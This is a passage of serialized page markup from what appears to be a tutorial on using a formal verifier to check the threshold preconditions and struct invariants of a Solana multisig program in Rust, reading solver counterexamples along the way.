}\n",[31215],{"type":27,"tag":84,"props":31216,"children":31217},{"__ignoreMap":7},[31218,31226],{"type":27,"tag":207,"props":31219,"children":31220},{"class":209,"line":210},[31221],{"type":27,"tag":207,"props":31222,"children":31223},{"style":238},[31224],{"type":33,"value":31225},"#[succeeds_if()]\n",{"type":27,"tag":207,"props":31227,"children":31228},{"class":209,"line":244},[31229,31233,31237,31241,31245,31249,31254,31258],{"type":27,"tag":207,"props":31230,"children":31231},{"style":214},[31232],{"type":33,"value":20967},{"type":27,"tag":207,"props":31234,"children":31235},{"style":214},[31236],{"type":33,"value":20972},{"type":27,"tag":207,"props":31238,"children":31239},{"style":1335},[31240],{"type":33,"value":14394},{"type":27,"tag":207,"props":31242,"children":31243},{"style":238},[31244],{"type":33,"value":1343},{"type":27,"tag":207,"props":31246,"children":31247},{"style":226},[31248],{"type":33,"value":16867},{"type":27,"tag":207,"props":31250,"children":31251},{"style":238},[31252],{"type":33,"value":31253},") { ",{"type":27,"tag":207,"props":31255,"children":31256},{"style":226},[31257],{"type":33,"value":16867},{"type":27,"tag":207,"props":31259,"children":31260},{"style":238},[31261],{"type":33,"value":16872},{"type":27,"tag":36,"props":31263,"children":31264},{},[31265],{"type":33,"value":31266},"Running the solver, we get:",{"type":27,"tag":101,"props":31268,"children":31270},{"code":31269},"...\nVERIFICATION:- FAILED\nVerification Time: 6.404167s\n",[31271],{"type":27,"tag":84,"props":31272,"children":31273},{"__ignoreMap":7},[31274],{"type":33,"value":31269},{"type":27,"tag":36,"props":31276,"children":31277},{},[31278,31280,31285],{"type":33,"value":31279},"This means that ",{"type":27,"tag":84,"props":31281,"children":31283},{"className":31282},[],[31284],{"type":33,"value":11278},{"type":33,"value":31286}," does not imply that the function will succeed (which is expected looking at the implementation above).",{"type":27,"tag":36,"props":31288,"children":31289},{},[31290],{"type":33,"value":31291},"We can ask the solver to produce a counterexample:",{"type":27,"tag":101,"props":31293,"children":31295},{"code":31294},"threshold: 33764\ncreate_key: ...\nmembers: SparseVec { size: 19 }\n",[31296],{"type":27,"tag":84,"props":31297,"children":31298},{"__ignoreMap":7},[31299],{"type":33,"value":31294},{"type":27,"tag":36,"props":31301,"children":31302},{},[31303],{"type":33,"value":31304},"In this case, we can see that the threshold is invalid; it should not be larger than the number of members.",{"type":27,"tag":36,"props":31306,"children":31307},{},[31308],{"type":27,"tag":942,"props":31309,"children":31310},{},[31311,31313,31319],{"type":33,"value":31312},"Note also that the verifier decided to use a ",{"type":27,"tag":84,"props":31314,"children":31316},{"className":31315},[],[31317],{"type":33,"value":31318},"SparseVec",{"type":33,"value":31320}," which is one of our custom vec implementations. In this case, the code we are verifying doesn't actually read or write to the vector and so we can model it simply as a symbolic size (with no data).",{"type":27,"tag":36,"props":31322,"children":31323},{},[31324],{"type":27,"tag":942,"props":31325,"children":31326},{},[31327,31329,31334,31335,31341,31343,31348,31350,31355],{"type":33,"value":31328},"Using a sparse vec rather than a concrete vec is generally preferred as it speeds up computation and allows us to model arbitrarily sized vecs. ",{"type":27,"tag":84,"props":31330,"children":31332},{"className":31331},[],[31333],{"type":33,"value":11096},{"type":33,"value":1131},{"type":27,"tag":84,"props":31336,"children":31338},{"className":31337},[],[31339],{"type":33,"value":31340},"pop",{"type":33,"value":31342}," are stubbed out to simply panic for the ",{"type":27,"tag":84,"props":31344,"children":31346},{"className":31345},[],[31347],{"type":33,"value":31318},{"type":33,"value":31349}," and if this code tried to do that we would fall back to the concrete ",{"type":27,"tag":84,"props":31351,"children":31353},{"className":31352},[],[31354],{"type":33,"value":24484},{"type":33,"value":31356}," type.",{"type":27,"tag":36,"props":31358,"children":31359},{},[31360],{"type":33,"value":31361},"We can add this to our constraint and try again:",{"type":27,"tag":101,"props":31363,"children":31365},{"code":31364,"language":10269,"meta":7,"className":10270,"style":7},"#[succeeds_if(\n (threshold as usize) \u003C= members.len()\n)]\npub fn create(...) { ... }\n",[31366],{"type":27,"tag":84,"props":31367,"children":31368},{"__ignoreMap":7},[31369,31377,31414,31421],{"type":27,"tag":207,"props":31370,"children":31371},{"class":209,"line":210},[31372],{"type":27,"tag":207,"props":31373,"children":31374},{"style":238},[31375],{"type":33,"value":31376},"#[succeeds_if(\n",{"type":27,"tag":207,"props":31378,"children":31379},{"class":209,"line":244},[31380,31385,31389,31393,31397,31401,31405,31409],{"type":27,"tag":207,"props":31381,"children":31382},{"style":238},[31383],{"type":33,"value":31384}," (threshold ",{"type":27,"tag":207,"props":31386,"children":31387},{"style":214},[31388],{"type":33,"value":16122},{"type":27,"tag":207,"props":31390,"children":31391},{"style":8920},[31392],{"type":33,"value":21008},{"type":27,"tag":207,"props":31394,"children":31395},{"style":238},[31396],{"type":33,"value":2222},{"type":27,"tag":207,"props":31398,"children":31399},{"style":226},[31400],{"type":33,"value":26685},{"type":27,"tag":207,"props":31402,"children":31403},{"style":238},[31404],{"type":33,"value":30657},{"type":27,"tag":207,"props":31406,"children":31407},{"style":226},[31408],{"type":33,"value":1041},{"type":27,"tag":207,"props":31410,"children":31411},{"style":238},[31412],{"type":33,"value":31413},"len()\n",{"type":27,"tag":207,"props":31415,"children":31416},{"class":209,"line":270},[31417],{"type":27,"tag":207,"props":31418,"children":31419},{"style":238},[31420],{"type":33,"value":27530},{"type":27,"tag":207,"props":31422,"children":31423},{"class":209,"line":296},[31424,31428,31432,31436,31440,31444,31448,31452],{"type":27,"tag":207,"props":31425,"children":31426},{"style":214},[31427],{"type":33,"value":20967},{"type":27,"tag":207,"props":31429,"children":31430},{"style":214},[31431],{"type":33,"value":20972},{"type":27,"tag":207,"props":31433,"children":31434},{"style":1335},[31435],{"type":33,"value":14394},{"type":27,"tag":207,"props":31437,"children":31438},{"style":238},[31439],{"type":33,"value":1343},{"type":27,"tag":207,"props":31441,"children":31442},{"style":226},[31443],{"type":33,"value":16867},{"type":27,"tag":207,"props":31445,"children":31446},{"style":238},[31447],{"type":33,"value":31253},{"type":27,"tag":207,"props":31449,"children":31450},{"style":226},[31451],{"type":33,"value":16867},{"type":27,"tag":207,"props":31453,"children":31454},{"style":238},[31455],{"type":33,"value":16872},{"type":27,"tag":36,"props":31457,"children":31458},{},[31459],{"type":33,"value":31460},"Verification failed again! This time we get a different counterexample:",{"type":27,"tag":101,"props":31462,"children":31464},{"code":31463},"threshold: 0\ncreate_key: ...\nmembers: SparseVec { size: 19 }\n",[31465],{"type":27,"tag":84,"props":31466,"children":31467},{"__ignoreMap":7},[31468],{"type":33,"value":31463},{"type":27,"tag":36,"props":31470,"children":31471},{},[31472],{"type":33,"value":31473},"Aha! The threshold cannot be 0 either... Let's try again:",{"type":27,"tag":101,"props":31475,"children":31477},{"code":31476,"language":10269,"meta":7,"className":10270,"style":7},"#[succeeds_if(\n (threshold as usize) \u003C= members.len()\n && threshold != 0\n)]\npub fn create(...) { ... }\n",[31478],{"type":27,"tag":84,"props":31479,"children":31480},{"__ignoreMap":7},[31481,31488,31523,31544,31551],{"type":27,"tag":207,"props":31482,"children":31483},{"class":209,"line":210},[31484],{"type":27,"tag":207,"props":31485,"children":31486},{"style":238},[31487],{"type":33,"value":31376},{"type":27,"tag":207,"props":31489,"children":31490},{"class":209,"line":244},[31491,31495,31499,31503,31507,31511,31515,31519],{"type":27,"tag":207,"props":31492,"children":31493},{"style":238},[31494],{"type":33,"value":31384},{"type":27,"tag":207,"props":31496,"children":31497},{"style":214},[31498],{"type":33,"value":16122},{"type":27,"tag":207,"props":31500,"children":31501},{"style":8920},[31502],{"type":33,"value":21008},{"type":27,"tag":207,"props":31504,"children":31505},{"style":238},[31506],{"type":33,"value":2222},{"type":27,"tag":207,"props":31508,"children":31509},{"style":226},[31510],{"type":33,"value":26685},{"type":27,"tag":207,"props":31512,"children":31513},{"style":238},[31514],{"type":33,"value":30657},{"type":27,"tag":207,"props":31516,"children":31517},{"style":226},[31518],{"type":33,"value":1041},{"type":27,"tag":207,"props":31520,"children":31521},{"style":238},[31522],{"type":33,"value":31413},{"type":27,"tag":207,"props":31524,"children":31525},{"class":209,"line":270},[31526,31530,31535,31539],{"type":27,"tag":207,"props":31527,"children":31528},{"style":226},[31529],{"type":33,"value":22896},{"type":27,"tag":207,"props":31531,"children":31532},{"style":238},[31533],{"type":33,"value":31534}," threshold ",{"type":27,"tag":207,"props":31536,"children":31537},{"style":226},[31538],{"type":33,"value":22963},{"type":27,"tag":207,"props":31540,"children":31541},{"style":238},[31542],{"type":33,"value":31543}," 0\n",{"type":27,"tag":207,"props":31545,"children":31546},{"class":209,"line":296},[31547],{"type":27,"tag":207,"props":31548,"children":31549},{"style":238},[31550],{"type":33,"value":27530},{"type":27,"tag":207,"props":31552,"children":31553},{"class":209,"line":445},[31554,31558,31562,31566,31570,31574,31578,31582],{"type":27,"tag":207,"props":31555,"children":31556},{"style":214},[31557],{"type":33,"value":20967},{"type":27,"tag":207,"props":31559,"children":31560},{"style":214},[31561],{"type":33,"value":20972},{"type":27,"tag":207,"props":31563,"children":31564},{"style":1335},[31565],{"type":33,"value":14394},{"type":27,"tag":207,"props":31567,"children":31568},{"style":238},[31569],{"type":33,"value":1343},{"type":27,"tag":207,"props":31571,"children":31572},{"style":226},[31573],{"type":33,"value":16867},{"type":27,"tag":207,"props":31575,"children":31576},{"style":238},[31577],{"type":33,"value":31253},{"type":27,"tag":207,"props":31579,"children":31580},{"style":226},[31581],{"type":33,"value":16867},{"type":27,"tag":207,"props":31583,"children":31584},{"style":238},[31585],{"type":33,"value":16872},{"type":27,"tag":36,"props":31587,"children":31588},{},[31589],{"type":33,"value":31590},"A third counterexample:",{"type":27,"tag":101,"props":31592,"children":31594},{"code":31593},"threshold: 4\ncreate_key: ...\nmembers: SparseVec { size: 536870920 }\n",[31595],{"type":27,"tag":84,"props":31596,"children":31597},{"__ignoreMap":7},[31598],{"type":33,"value":31593},{"type":27,"tag":36,"props":31600,"children":31601},{},[31602,31604,31610],{"type":33,"value":31603},"Here we see the size of our ",{"type":27,"tag":84,"props":31605,"children":31607},{"className":31606},[],[31608],{"type":33,"value":31609},"members",{"type":33,"value":31611}," vec is huge! We need to constrain that to be less than u16::MAX:",{"type":27,"tag":101,"props":31613,"children":31615},{"code":31614,"language":10269,"meta":7,"className":10270,"style":7},"#[succeeds_if(\n (threshold as usize) \u003C= members.len()\n && (threshold != 0)\n && (members.len() \u003C= (u16::MAX as usize))\n)]\npub fn create(...) { ... }\n",[31616],{"type":27,"tag":84,"props":31617,"children":31618},{"__ignoreMap":7},[31619,31626,31661,31682,31734,31741],{"type":27,"tag":207,"props":31620,"children":31621},{"class":209,"line":210},[31622],{"type":27,"tag":207,"props":31623,"children":31624},{"style":238},[31625],{"type":33,"value":31376},{"type":27,"tag":207,"props":31627,"children":31628},{"class":209,"line":244},[31629,31633,31637,31641,31645,31649,31653,31657],{"type":27,"tag":207,"props":31630,"children":31631},{"style":238},[31632],{"type":33,"value":31384},{"type":27,"tag":207,"props":31634,"children":31635},{"style":214},[31636],{"type":33,"value":16122},{"type":27,"tag":207,"props":31638,"children":31639},{"style":8920},[31640],{"type":33,"value":21008},{"type":27,"tag":207,"props":31642,"children":31643},{"style":238},[31644],{"type":33,"value":2222},{"type":27,"tag":207,"props":31646,"children":31647},{"style":226},[31648],{"type":33,"value":26685},{"type":27,"tag":207,"props":31650,"children":31651},{"style":238},[31652],{"type":33,"value":30657},{"type":27,"tag":207,"props":31654,"children":31655},{"style":226},[31656],{"type":33,"value":1041},{"type":27,"tag":207,"props":31658,"children":31659},{"style":238},[31660],{"type":33,"value":31413},{"type":27,"tag":207,"props":31662,"children":31663},{"class":209,"line":270},[31664,31668,31673,31677],{"type":27,"tag":207,"props":31665,"children":31666},{"style":226},[31667],{"type":33,"value":22896},{"type":27,"tag":207,"props":31669,"children":31670},{"style":238},[31671],{"type":33,"value":31672}," (threshold ",{"type":27,"tag":207,"props":31674,"children":31675},{"style":226},[31676],{"type":33,"value":22963},{"type":27,"tag":207,"props":31678,"children":31679},{"style":238},[31680],{"type":33,"value":31681}," 0)\n",{"type":27,"tag":207,"props":31683,"children":31684},{"class":209,"line":296},[31685,31689,31693,31697,31701,31705,31709,31714,31718,31722,31726,31730],{"type":27,"tag":207,"props":31686,"children":31687},{"style":226},[31688],{"type":33,"value":22896},{"type":27,"tag":207,"props":31690,"children":31691},{"style":238},[31692],{"type":33,"value":30271},{"type":27,"tag":207,"props":31694,"children":31695},{"style":226},[31696],{"type":33,"value":1041},{"type":27,"tag":207,"props":31698,"children":31699},{"style":238},[31700],{"type":33,"value":28293},{"type":27,"tag":207,"props":31702,"children":31703},{"style":226},[31704],{"type":33,"value":26685},{"type":27,"tag":207,"props":31706,"children":31707},{"style":238},[31708],{"type":33,"value":686},{"type":27,"tag":207,"props":31710,"children":31711},{"style":8920},[31712],{"type":33,"value":31713},"u16",{"type":27,"tag":207,"props":31715,"children":31716},{"style":226},[31717],{"type":33,"value":10768},{"type":27,"tag":207,"props":31719,"children":31720},{"style":8920},[31721],{"type":33,"value":28311},{"type":27,"tag":207,"props":31723,"children":31724},{"style":214},[31725],{"type":33,"value":16108},{"type":27,"tag":207,"props":31727,"children":31728},{"style":8920},[31729],{"type":33,"value":21008},{"type":27,"tag":207,"props":31731,"children":31732},{"style":238},[31733],{"type":33,"value":26983},{"type":27,"tag":207,"props":31735,"children":31736},{"class":209,"line":445},[31737],{"type":27,"tag":207,"props":31738,"children":31739},{"style":238},[31740],{"type":33,"value":27530},{"type":27,"tag":207,"props":31742,"children":31743},{"class":209,"line":867},[31744,31748,31752,31756,31760,31764,31768,31772],{"type":27,"tag":207,"props":31745,"children":31746},{"style":214},[31747],{"type":33,"value":20967},{"type":27,"tag":207,"props":31749,"children":31750},{"style":214},[31751],{"type":33,"value":20972},{"type":27,"tag":207,"props":31753,"children":31754},{"style":1335},[31755],{"type":33,"value":14394},{"type":27,"tag":207,"props":31757,"children":31758},{"style":238},[31759],{"type":33,"value":1343},{"type":27,"tag":207,"props":31761,"children":31762},{"style":226},[31763],{"type":33,"value":16867},{"type":27,"tag":207,"props":31765,"children":31766},{"style":238},[31767],{"type":33,"value":31253},{"type":27,"tag":207,"props":31769,"children":31770},{"style":226},[31771],{"type":33,"value":16867},{"type":27,"tag":207,"props":31773,"children":31774},{"style":238},[31775],{"type":33,"value":16872},{"type":27,"tag":36,"props":31777,"children":31778},{},[31779],{"type":33,"value":31780},"And now we get:",{"type":27,"tag":101,"props":31782,"children":31784},{"code":31783},"VERIFICATION:- SUCCESSFUL\nVerification Time: 6.6634517s\n",[31785],{"type":27,"tag":84,"props":31786,"children":31787},{"__ignoreMap":7},[31788],{"type":33,"value":31783},{"type":27,"tag":36,"props":31790,"children":31791},{},[31792],{"type":33,"value":31793},"🥳🥳🥳",{"type":27,"tag":36,"props":31795,"children":31796},{},[31797],{"type":33,"value":31798},"The attentive reader may have noticed that we didn't need to verify this condition:",{"type":27,"tag":101,"props":31800,"children":31802},{"code":31801,"language":10269,"meta":7,"className":10270,"style":7},"if total_members \u003C 1 {\n return err!(MsError::EmptyMembers);\n}\n",[31803],{"type":27,"tag":84,"props":31804,"children":31805},{"__ignoreMap":7},[31806,31829,31860],{"type":27,"tag":207,"props":31807,"children":31808},{"class":209,"line":210},[31809,31813,31817,31821,31825],{"type":27,"tag":207,"props":31810,"children":31811},{"style":376},[31812],{"type":33,"value":9023},{"type":27,"tag":207,"props":31814,"children":31815},{"style":220},[31816],{"type":33,"value":30736},{"type":27,"tag":207,"props":31818,"children":31819},{"style":226},[31820],{"type":33,"value":4695},{"type":27,"tag":207,"props":31822,"children":31823},{"style":232},[31824],{"type":33,"value":235},{"type":27,"tag":207,"props":31826,"children":31827},{"style":238},[31828],{"type":33,"value":384},{"type":27,"tag":207,"props":31830,"children":31831},{"class":209,"line":244},[31832,31836,31840,31844,31848,31852,31856],{"type":27,"tag":207,"props":31833,"children":31834},{"style":376},[31835],{"type":33,"value":8986},{"type":27,"tag":207,"props":31837,"children":31838},{"style":1335},[31839],{"type":33,"value":30791},{"type":27,"tag":207,"props":31841,"children":31842},{"style":238},[31843],{"type":33,"value":1343},{"type":27,"tag":207,"props":31845,"children":31846},{"style":8920},[31847],{"type":33,"value":30800},{"type":27,"tag":207,"props":31849,"children":31850},{"style":226},[31851],{"type":33,"value":10768},{"type":27,"tag":207,"props":31853,"children":31854},{"style":8920},[31855],{"type":33,"value":30809},{"type":27,"tag":207,"props":31857,"children":31858},{"style":238},[31859],{"type":33,"value":1455},{"type":27,"tag":207,"props":31861,"children":31862},{"class":209,"line":270},[31863],{"type":27,"tag":207,"props":31864,"children":31865},{"style":238},[31866],{"type":33,"value":451},{"type":27,"tag":36,"props":31868,"children":31869},{},[31870,31872,31878,31880,31885,31887,31892,31894,31899],{"type":33,"value":31871},"In this case this is actually redundant because if ",{"type":27,"tag":84,"props":31873,"children":31875},{"className":31874},[],[31876],{"type":33,"value":31877},"members.len() == 0",{"type":33,"value":31879}," then our threshold would also have to be ",{"type":27,"tag":84,"props":31881,"children":31883},{"className":31882},[],[31884],{"type":33,"value":1660},{"type":33,"value":31886}," (and our ",{"type":27,"tag":84,"props":31888,"children":31890},{"className":31889},[],[31891],{"type":33,"value":30022},{"type":33,"value":31893}," is not allowed to be ",{"type":27,"tag":84,"props":31895,"children":31897},{"className":31896},[],[31898],{"type":33,"value":1660},{"type":33,"value":31900},"). The solver realizes that this situation is impossible and therefore the expression we have above is sufficient!",{"type":27,"tag":58,"props":31902,"children":31904},{"id":31903},"_2-verify-threshold-requirements",[31905],{"type":33,"value":31906},"2. Verify threshold requirements",{"type":27,"tag":36,"props":31908,"children":31909},{},[31910],{"type":33,"value":31911},"A critical security property for multisigs is that the threshold should never be zero (which would let anyone issue transactions) and the threshold should never be greater than the number of members (which would let nobody issue transactions).",{"type":27,"tag":36,"props":31913,"children":31914},{},[31915,31917,31921],{"type":33,"value":31916},"Unlike the previous example, we want to verify this in ",{"type":27,"tag":942,"props":31918,"children":31919},{},[31920],{"type":33,"value":16576},{"type":33,"value":31922}," cases. I.e. any instruction that could mutate the multisig account.",{"type":27,"tag":36,"props":31924,"children":31925},{},[31926,31928,31932,31934,31939],{"type":33,"value":31927},"In this case, we want to model this as an ",{"type":27,"tag":942,"props":31929,"children":31930},{},[31931],{"type":33,"value":29050},{"type":33,"value":31933}," on the ",{"type":27,"tag":84,"props":31935,"children":31937},{"className":31936},[],[31938],{"type":33,"value":30014},{"type":33,"value":31940}," account struct:",{"type":27,"tag":101,"props":31942,"children":31944},{"code":31943,"language":10269,"meta":7,"className":10270,"style":7},"#[account]\n#[derive(Clone, Debug)]\n#[invariant(\n (self.threshold >= 1)\n && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms {\n pub threshold: u16, // threshold for signatures\n pub authority_index: u16, // index to seed other authorities under this multisig\n pub transaction_index: u32, // look up and seed reference for transactions\n pub ms_change_index: u32, // the last executed/closed transaction\n pub bump: u8, // bump for the multisig seed\n pub create_key: Pubkey, // random key(or not) used to seed the multisig pda\n pub allow_external_execute: bool, // allow non-member keys to execute txs\n pub keys: Vec\u003CPubkey>, // keys of the members\n}\n",[31945],{"type":27,"tag":84,"props":31946,"children":31947},{"__ignoreMap":7},[31948,31955,31980,31987,32011,32062,32069,32088,32115,32142,32169,32196,32223,32250,32277,32312],{"type":27,"tag":207,"props":31949,"children":31950},{"class":209,"line":210},[31951],{"type":27,"tag":207,"props":31952,"children":31953},{"style":238},[31954],{"type":33,"value":28042},{"type":27,"tag":207,"props":31956,"children":31957},{"class":209,"line":244},[31958,31962,31967,31971,31976],{"type":27,"tag":207,"props":31959,"children":31960},{"style":238},[31961],{"type":33,"value":30110},{"type":27,"tag":207,"props":31963,"children":31964},{"style":8920},[31965],{"type":33,"value":31966},"Clone",{"type":27,"tag":207,"props":31968,"children":31969},{"style":238},[31970],{"type":33,"value":1123},{"type":27,"tag":207,"props":31972,"children":31973},{"style":8920},[31974],{"type":33,"value":31975},"Debug",{"type":27,"tag":207,"props":31977,"children":31978},{"style":238},[31979],{"type":33,"value":27530},{"type":27,"tag":207,"props":31981,"children":31982},{"class":209,"line":270},[31983],{"type":27,"tag":207,"props":31984,"children":31985},{"style":238},[31986],{"type":33,"value":28050},{"type":27,"tag":207,"props":31988,"children":31989},{"class":209,"line":296},[31990,31995,31999,32003,32007],{"type":27,"tag":207,"props":31991,"children":31992},{"style":238},[31993],{"type":33,"value":31994}," (self",{"type":27,"tag":207,"props":31996,"children":31997},{"style":226},[31998],{"type":33,"value":1041},{"type":27,"tag":207,"props":32000,"children":32001},{"style":238},[32002],{"type":33,"value":28343},{"type":27,"tag":207,"props":32004,"children":32005},{"style":226},[32006],{"type":33,"value":17220},{"type":27,"tag":207,"props":32008,"children":32009},{"style":238},[32010],{"type":33,"value":28352},{"type":27,"tag":207,"props":32012,"children":32013},{"class":209,"line":445},[32014,32018,32022,32026,32030,32034,32038,32042,32046,32050,32054,32058],{"type":27,"tag":207,"props":32015,"children":32016},{"style":226},[32017],{"type":33,"value":22896},{"type":27,"tag":207,"props":32019,"children":32020},{"style":238},[32021],{"type":33,"value":28276},{"type":27,"tag":207,"props":32023,"children":32024},{"style":226},[32025],{"type":33,"value":1041},{"type":27,"tag":207,"props":32027,"children":32028},{"style":238},[32029],{"type":33,"value":28343},{"type":27,"tag":207,"props":32031,"children":32032},{"style":214},[32033],{"type":33,"value":16122},{"type":27,"tag":207,"props":32035,"children":32036},{"style":8920},[32037],{"type":33,"value":21008},{"type":27,"tag":207,"props":32039,"children":32040},{"style":226},[32041],{"type":33,"value":15478},{"type":27,"tag":207,"props":32043,"children":32044},{"style":238},[32045],{"type":33,"value":21073},{"type":27,"tag":207,"props":32047,"children":32048},{"style":226},[32049],{"type":33,"value":1041},{"type":27,"tag":207,"props":32051,"children":32052},{"style":238},[32053],{"type":33,"value":28255},{"type":27,"tag":207,"props":32055,"children":32056},{"style":226},[32057],{"type":33,"value":1041},{"type":27,"tag":207,"props":32059,"children":32060},{"style":238},[32061],{"type":33,"value":28404},{"type":27,"tag":207,"props":32063,"children":32064},{"class":209,"line":867},[32065],{"type":27,"tag":207,"props":32066,"children":32067},{"style":238},[32068],{"type":33,"value":27530},{"type":27,"tag":207,"props":32070,"children":32071},{"class":209,"line":892},[32072,32076,32080,32084],{"type":27,"tag":207,"props":32073,"children":32074},{"style":214},[32075],{"type":33,"value":20967},{"type":27,"tag":207,"props":32077,"children":32078},{"style":214},[32079],{"type":33,"value":28423},{"type":27,"tag":207,"props":32081,"children":32082},{"style":8920},[32083],{"type":33,"value":28428},{"type":27,"tag":207,"props":32085,"children":32086},{"style":238},[32087],{"type":33,"value":384},{"type":27,"tag":207,"props":32089,"children":32090},{"class":209,"line":1475},[32091,32095,32099,32103,32107,32111],{"type":27,"tag":207,"props":32092,"children":32093},{"style":214},[32094],{"type":33,"value":28115},{"type":27,"tag":207,"props":32096,"children":32097},{"style":220},[32098],{"type":33,"value":28444},{"type":27,"tag":207,"props":32100,"children":32101},{"style":226},[32102],{"type":33,"value":736},{"type":27,"tag":207,"props":32104,"children":32105},{"style":8920},[32106],{"type":33,"value":28302},{"type":27,"tag":207,"props":32108,"children":32109},{"style":238},[32110],{"type":33,"value":28457},{"type":27,"tag":207,"props":32112,"children":32113},{"style":4647},[32114],{"type":33,"value":28462},{"type":27,"tag":207,"props":32116,"children":32117},{"class":209,"line":2065},[32118,32122,32126,32130,32134,32138],{"type":27,"tag":207,"props":32119,"children":32120},{"style":214},[32121],{"type":33,"value":28115},{"type":27,"tag":207,"props":32123,"children":32124},{"style":220},[32125],{"type":33,"value":28474},{"type":27,"tag":207,"props":32127,"children":32128},{"style":226},[32129],{"type":33,"value":736},{"type":27,"tag":207,"props":32131,"children":32132},{"style":8920},[32133],{"type":33,"value":28302},{"type":27,"tag":207,"props":32135,"children":32136},{"style":238},[32137],{"type":33,"value":28487},{"type":27,"tag":207,"props":32139,"children":32140},{"style":4647},[32141],{"type":33,"value":28492},{"type":27,"tag":207,"props":32143,"children":32144},{"class":209,"line":2092},[32145,32149,32153,32157,32161,32165],{"type":27,"tag":207,"props":32146,"children":32147},{"style":214},[32148],{"type":33,"value":28115},{"type":27,"tag":207,"props":32150,"children":32151},{"style":220},[32152],{"type":33,"value":28504},{"type":27,"tag":207,"props":32154,"children":32155},{"style":226},[32156],{"type":33,"value":736},{"type":27,"tag":207,"props":32158,"children":32159},{"style":8920},[32160],{"type":33,"value":24820},{"type":27,"tag":207,"props":32162,"children":32163},{"style":238},[32164],{"type":33,"value":28517},{"type":27,"tag":207,"props":32166,"children":32167},{"style":4647},[32168],{"type":33,"value":28522},{"type":27,"tag":207,"props":32170,"children":32171},{"class":209,"line":2130},[32172,32176,32180,32184,32188,32192],{"type":27,"tag":207,"props":32173,"children":32174},{"style":214},[32175],{"type":33,"value":28115},{"type":27,"tag":207,"props":32177,"children":32178},{"style":220},[32179],{"type":33,"value":28534},{"type":27,"tag":207,"props":32181,"children":32182},{"style":226},[32183],{"type":33,"value":736},{"type":27,"tag":207,"props":32185,"children":32186},{"style":8920},[32187],{"type":33,"value":24820},{"type":27,"tag":207,"props":32189,"children":32190},{"style":238},[32191],{"type":33,"value":28487},{"type":27,"tag":207,"props":32193,"children":32194},{"style":4647},[32195],{"type":33,"value":28551},{"type":27,"tag":207,"props":32197,"children":32198},{"class":209,"line":2168},[32199,32203,32207,32211,32215,32219],{"type":27,"tag":207,"props":32200,"children":32201},{"style":214},[32202],{"type":33,"value":28115},{"type":27,"tag":207,"props":32204,"children":32205},{"style":220},[32206],{"type":33,"value":28563},{"type":27,"tag":207,"props":32208,"children":32209},{"style":226},[32210],{"type":33,"value":736},{"type":27,"tag":207,"props":32212,"children":32213},{"style":8920},[32214],{"type":33,"value":21910},{"type":27,"tag":207,"props":32216,"children":32217},{"style":238},[32218],{"type":33,"value":28576},{"type":27,"tag":207,"props":32220,"children":32221},{"style":4647},[32222],{"type":33,"value":28581},{"type":27,"tag":207,"props":32224,"children":32225},{"class":209,"line":4095},[32226,32230,32234,32238,32242,32246],{"type":27,"tag":207,"props":32227,"children":32228},{"style":214},[32229],{"type":33,"value":28115},{"type":27,"tag":207,"props":32231,"children":32232},{"style":220},[32233],{"type":33,"value":28593},{"type":27,"tag":207,"props":32235,"children":32236},{"style":226},[32237],{"type":33,"value":736},{"type":27,"tag":207,"props":32239,"children":32240},{"style":8920},[32241],{"type":33,"value":28129},{"type":27,"tag":207,"props":32243,"children":32244},{"style":238},[32245],{"type":33,"value":28606},{"type":27,"tag":207,"props":32247,"children":32248},{"style":4647},[32249],{"type":33,"value":28611},{"type":27,"tag":207,"props":32251,"children":32252},{"class":209,"line":4103},[32253,32257,32261,32265,32269,32273],{"type":27,"tag":207,"props":32254,"children":32255},{"style":214},[32256],{"type":33,"value":28115},{"type":27,"tag":207,"props":32258,"children":32259},{"style":220},[32260],{"type":33,"value":28623},{"type":27,"tag":207,"props":32262,"children":32263},{"style":226},[32264],{"type":33,"value":736},{"type":27,"tag":207,"props":32266,"children":32267},{"style":8920},[32268],{"type":33,"value":19327},{"type":27,"tag":207,"props":32270,"children":32271},{"style":238},[32272],{"type":33,"value":1123},{"type":27,"tag":207,"props":32274,"children":32275},{"style":4647},[32276],{"type":33,"value":28640},{"type":27,"tag":207,"props":32278,"children":32279},{"class":209,"line":4154},[32280,32284,32288,32292,32296,32300,32304,32308],{"type":27,"tag":207,"props":32281,"children":32282},{"style":214},[32283],{"type":33,"value":28115},{"type":27,"tag":207,"props":32285,"children":32286},{"style":220},[32287],{"type":33,"value":28652},{"type":27,"tag":207,"props":32289,"children":32290},{"style":226},[32291],{"type":33,"value":736},{"type":27,"tag":207,"props":32293,"children":32294},{"style":8920},[32295],{"type":33,"value":28661},{"type":27,"tag":207,"props":32297,"children":32298},{"style":238},[32299],{"type":33,"value":9257},{"type":27,"tag":207,"props":32301,"children":32302},{"style":8920},[32303],{"type":33,"value":28670},{"type":27,"tag":207,"props":32305,"children":32306},{"style":238},[32307],{"type":33,"value":28675},{"type":27,"tag":207,"props":32309,"children":32310},{"style":4647},[32311],{"type":33,"value":28680},{"type":27,"tag":207,"props":32313,"children":32314},{"class":209,"line":4203},[32315],{"type":27,"tag":207,"props":32316,"children":32317},{"style":238},[32318],{"type":33,"value":451},{"type":27,"tag":36,"props":32320,"children":32321},{},[32322,32324,32329],{"type":33,"value":32323},"Our verification framework will generate an invariant harness for each instruction. Instructions that can potentially modify the ",{"type":27,"tag":84,"props":32325,"children":32327},{"className":32326},[],[32328],{"type":33,"value":30014},{"type":33,"value":32330}," object will be checked to ensure that the invariant still holds after modification.",{"type":27,"tag":36,"props":32332,"children":32333},{},[32334,32336,32341],{"type":33,"value":32335},"Let's try this on the ",{"type":27,"tag":84,"props":32337,"children":32339},{"className":32338},[],[32340],{"type":33,"value":30093},{"type":33,"value":32342}," instruction that we've already seen:",{"type":27,"tag":101,"props":32344,"children":32346},{"code":32345},"VERIFICATION:- SUCCESSFUL\nVerification Time: 6.8006988s\n",[32347],{"type":27,"tag":84,"props":32348,"children":32349},{"__ignoreMap":7},[32350],{"type":33,"value":32345},{"type":27,"tag":36,"props":32352,"children":32353},{},[32354,32356,32361],{"type":33,"value":32355},"To ensure this is working, we can test by commenting out this check from ",{"type":27,"tag":84,"props":32357,"children":32359},{"className":32358},[],[32360],{"type":33,"value":30093},{"type":33,"value":736},{"type":27,"tag":101,"props":32363,"children":32365},{"code":32364,"language":10269,"meta":7,"className":10270,"style":7},"// if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n// return err!(MsError::InvalidThreshold);\n// 